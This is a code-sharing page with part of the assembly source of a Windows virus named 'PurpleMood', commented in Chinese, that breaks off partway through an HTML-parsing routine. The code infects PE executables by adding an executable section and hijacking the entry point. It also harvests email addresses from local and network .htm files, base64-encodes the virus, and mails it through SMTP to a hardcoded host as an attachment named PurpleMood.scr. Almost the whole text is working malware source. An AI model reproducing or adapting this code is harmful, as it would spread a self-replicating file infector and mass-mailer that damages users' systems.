📄 purplemood 紫色心情病毒源代码(2).txt
字号:
;感染PE文件
InfectFile PROC FileName : DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
LOCAL ByteWrite: DWORD
pushad
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push FileName
mov eax , 12345678h
_CreateFile = dword ptr $-4
call eax
cmp eax,INVALID_HANDLE_VALUE
jz IF_Exit
mov hFile,eax
push 0
push 0
push 0
push PAGE_READWRITE
push NULL
push hFile
mov eax , 12345678h
_CreateFileMapping = dword ptr $-4
call eax
or eax,eax
jz IF_F3
mov hMapping , eax
push 0
push 0
push 0
push FILE_MAP_READ+FILE_MAP_WRITE
push hMapping
mov eax , 12345678h
_MapViewOfFile = dword ptr $-4
call eax
or eax,eax
jz IF_F2
mov pMapping,eax
mov esi,eax
assume esi :ptr IMAGE_DOS_HEADER
.IF [esi].e_magic!=IMAGE_DOS_SIGNATURE
jmp IF_F1
.ENDIF
.IF [esi].e_lfarlc!=040h
jmp IF_F1
.ENDIF
add esi,[esi].e_lfanew ;此时edx指向PE文件头
assume esi:ptr IMAGE_NT_HEADERS
.IF [esi].Signature!=IMAGE_NT_SIGNATURE ;是PE文件吗?
jmp IF_F1
.ENDIF
.IF word ptr [esi].OptionalHeader.Subsystem!=2
jmp IF_F1
.ENDIF
.IF word ptr [esi+1ah]==0815h
jmp IF_F1
.ENDIF
mov eax,[esi].OptionalHeader.AddressOfEntryPoint
add eax,[esi].OptionalHeader.ImageBase
mov HostEntry[ebx],eax ;保存原入口
;***************************************************************
;判断是否有足够空间存储新节
;28h=sizeof IMAGE_SECTION_HEADER
;18h=sizeof IMAGE_FILE_HEADER+Signature
;edi将指向新节
;***************************************************************
movzx eax,[esi].FileHeader.NumberOfSections
mov ecx,28h
mul ecx
lea edi,[esi]
sub edi,pMapping
add eax,edi
add eax,18h
movzx edi,[esi].FileHeader.SizeOfOptionalHeader
add eax,edi
mov edi,eax
add edi,pMapping ;I forgot this first
add eax,28h
.IF eax>[esi].OptionalHeader.SizeOfHeaders
jmp IF_F1
.ENDIF
;*****************************************
;空间允许, ^0^,开始插入新节并填充各字段
;esi指向原文件最后一个节,利用它来填充新节某些字段
;*****************************************
inc [esi].FileHeader.NumberOfSections
assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],00736A78h ;'xjs'
push [esi].OptionalHeader.SizeOfImage
pop [edi].VirtualAddress
mov eax,offset VEnd-offset VStart
mov [edi].Misc.VirtualSize,eax
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx
inc eax
mul ecx
mov [edi].SizeOfRawData,eax
lea eax,[edi-28h+14h] ;PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;SizeOfRawData
mov ecx,[ecx]
add eax,ecx
mov [edi].PointerToRawData,eax
mov [edi].Characteristics,0E0000020h ;可读可写可执行
;***************************************************************
;更新SizeOfImage,AddressOfEntryPoint,使新节可以正确加载并首先执行
;***************************************************************
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
mov eax,[edi].VirtualAddress
mov [esi].OptionalHeader.AddressOfEntryPoint,eax
mov word ptr [esi+1ah],0815h ;写入感染标志
push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hFile
mov eax , 12345678h
_SetFilePointer = dword ptr $-4
call eax
;****************************************************************
;设置文件指针到结尾后,写入从VStart开始的代码,大小经过文件对齐
;****************************************************************
push 0
lea eax,ByteWrite
push eax
push [edi].SizeOfRawData
lea eax,[offset VStart+ebx]
push eax
push hFile
mov eax , 12345678h
_WriteFile = dword ptr $-4
call eax
IF_F1:
push pMapping
mov eax , 12345678h
_UnmapViewOfFile = dword ptr $-4
call eax
IF_F2:
push hMapping
call _CloseHandle[ebx]
IF_F3:
push hFile
call _CloseHandle[ebx]
IF_Exit:
popad
ret 4
InfectFile ENDP
;*****************电子邮件传播线程***************************
;从本地、网络的*.htm*获得邮件地址.
;***********************************************************
MailThread:
call MailInit
MT_Work:
push FILE_HTM
@pushsz 'c:'
call EnumDisk
push 1000*60*60*24 ;sleep a day :)
call _Sleep[ebx]
jmp short MT_Work
;*********************************************************
;Mutate virus to BASE64 only once
;*********************************************************
MailInit PROC
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
pushad
xor edi,edi
push edi
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push edi
push FILE_SHARE_READ
push GENERIC_READ
lea eax,[offset szFilePath+ebx]
push eax
call _CreateFile[ebx]
mov hFile,eax
push edi
push edi
push edi
push PAGE_READONLY
push edi
push eax
call _CreateFileMapping[ebx]
mov hMapping,eax
push edi
push edi
push edi
push FILE_MAP_READ
push eax
call _MapViewOfFile[ebx]
mov pMapping,eax
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push SIZEOF_VIRUS_FILE*2
push edi
call _VirtualAlloc[ebx]
mov Base64_Encoded_Data[ebx],eax
mov esi,pMapping
mov edi,Base64_Encoded_Data[ebx]
call EncodeBase64
@pushsz 'WSOCK32.DLL'
call _LoadLibraryA[ebx]
xchg eax,edi ;hSockDll
@pushsz 'WSAStartup'
push edi
call _GetProcAddress[ebx]
lea esi,[offset WSA_Data+ebx]
push esi
push 0202h ;!!!warning 2.2
call eax
@pushsz 'socket'
push edi
call _GetProcAddress[ebx]
mov [offset _socket+ebx],eax
@pushsz 'gethostbyname'
push edi
call _GetProcAddress[ebx]
@pushsz 'pact518.hit.edu.cn'
call eax
mov esi,[eax+12]
lodsd
push [eax]
pop [offset ServIP + ebx]
@pushsz 'connect'
push edi
call _GetProcAddress[ebx]
mov [offset _connect+ebx],eax
@pushsz 'send'
push edi
call _GetProcAddress[ebx]
mov [offset _send+ebx],eax
@pushsz 'closesocket'
push edi
call _GetProcAddress[ebx]
mov [offset _closecsoket+ebx],eax
MI_Close3:
push pMapping
call _UnmapViewOfFile[ebx]
MI_Close2:
push hMapping
call _CloseHandle[ebx]
MI_Close:
push hFile
call _CloseHandle[ebx]
MI_Exit:
popad
ret
MailInit ENDP
;**********************************
;esi <- Buffer with data to encode
;edi <- Destination buffer
;**********************************
EncodeBase64 Proc
LOCAL BASE64_lines : DWORD
xor ecx,ecx
mov BASE64_lines,ecx
cld
BASE64encode_loop:
cmp ecx,SIZEOF_VIRUS_FILE
jae BASE64__exit
xor edx,edx
mov dh,byte ptr [esi+ecx]
inc ecx
cmp ecx,SIZEOF_VIRUS_FILE
jae BASE64__00
mov dl,byte ptr [esi+ecx]
BASE64__00:
inc ecx
shl edx,08h
cmp ecx,SIZEOF_VIRUS_FILE
jae BASE64__01
mov dl,byte ptr [esi+ecx]
BASE64__01:
inc ecx
mov eax,edx
and eax,00fc0000h
shr eax,12h
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
mov eax,edx
and eax,0003f000h
shr eax,0Ch
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
mov eax,edx
and eax,00000fc0h
shr eax,06h
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
mov eax,edx
and eax,0000003fh
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
cmp ecx,SIZEOF_VIRUS_FILE
jbe BASE64__02
mov byte ptr [edi-00000001h],'='
BASE64__02:
cmp ecx,SIZEOF_VIRUS_FILE+01h
jbe BASE64__03
mov byte ptr [edi-00000002h],'='
inc BASE64_lines
cmp BASE64_lines,00000013h
jne BASE64encode_loop
mov ax,0A0Dh
stosw
mov BASE64_lines,00000000h
BASE64__03:
jmp BASE64encode_loop
BASE64__exit:
mov ax,0A0Dh
stosw
ret
EncodeBase64 EndP
;**********************************************
;发送邮件函数
;1. 连接SMTP Server
;2. 发送协议信息,发送BASE64编码的附件,发送其余数据
;warning: 发送数据的长度
;**********************************************
SendMail PROC
pushad
push NULL
push SOCK_STREAM
push AF_INET
mov eax , 12345678h
_socket = dword ptr $-4
call eax
mov VSocket[ebx],eax
push sizeof(sockaddr) ; Size of connect strucure=16
call @SMTP1 ; Connect structure
dw AF_INET ; Family
db 0,25 ; Port number,avoid htons :)
ServIP dd 0 ; in_addr of server
db 8 dup(0) ; Unused
@SMTP1:
push [offset VSocket+ebx]
mov eax , 12345678h
_connect = dword ptr $-4
call eax
lea eax,[offset SM_I+ebx]
push eax
mov eax,12345678h
_lstrlen = dword ptr $ - 4
call eax
push NULL
push eax
call SM_I_End
SM_I:
HelloServer db 'HELO cx',0dh,0ah
db 'MAIL FROM: <'
TempMailTo db 128 dup (0)
SM_I_End:
push [offset VSocket+ebx]
call _send[ebx]
push NULL
push SM_II_End - SM_II
call SM_II_End
SM_II:
db '>',0dh,0ah
RcptTo db 'RCPT TO: <test@pact518.hit.edu.cn>',0dh,0ah
SM_II_End:
push [offset VSocket+ebx]
call _send[ebx]
push NULL
push SM_Data_Len
call SM_Data
MailData db 'DATA',0dh,0ah
db 'Subject:hi',0dh,0ah
db 'Content-Type: multipart/mixed;boundary=WC_MAIL_PaRt_BoUnDaR
y_05151998',0dh,0ah
db '--WC_MAIL_PaRt_BoUnDaRy_05151998',0dh,0ah
db 'Content-Type: application/octet-stream; file=PurpleMood.scr',0dh,0
ah
db 'Content-Transfer-Encoding: base64',0dh,0ah
db 'Content-Disposition: attachment; filename=PurpleMood.scr',0
dh,0ah,0dh,0ah
SM_Data_Len = $ - MailData
SM_Data:
push [offset VSocket+ebx]
call _send[ebx]
mov eax,Base64_Encoded_Data[ebx]
push eax
call _lstrlen[ebx]
push NULL ;Send base64 attachment
push eax ;SIZEOF_VIRUS_BASE64
push [offset Base64_Encoded_Data+ebx] ; Buffer
push [offset VSocket+ebx]
call _send[ebx]
push NULL
push SM_DR_Len
call SM_DR
MailDataRemain db '--WC_MAIL_PaRt_BoUnDaRy_05151998--',0dh,0ah
db 0dh,0ah,'.',0dh,0ah,'QUIT',0dh,0ah
SM_DR_Len = $ - MailDataRemain
SM_DR:
push [offset VSocket+ebx]
call _send[ebx]
push [offset VSocket+ebx]
mov eax , 12345678h
_closecsoket = dword ptr $-4
call eax
popad
ret
SendMail ENDP
;分析MailFileName(*.htm*),寻找Mail_Addr.
Parse_HTM PROC FileName :DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL SafeFSize: DWORD
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -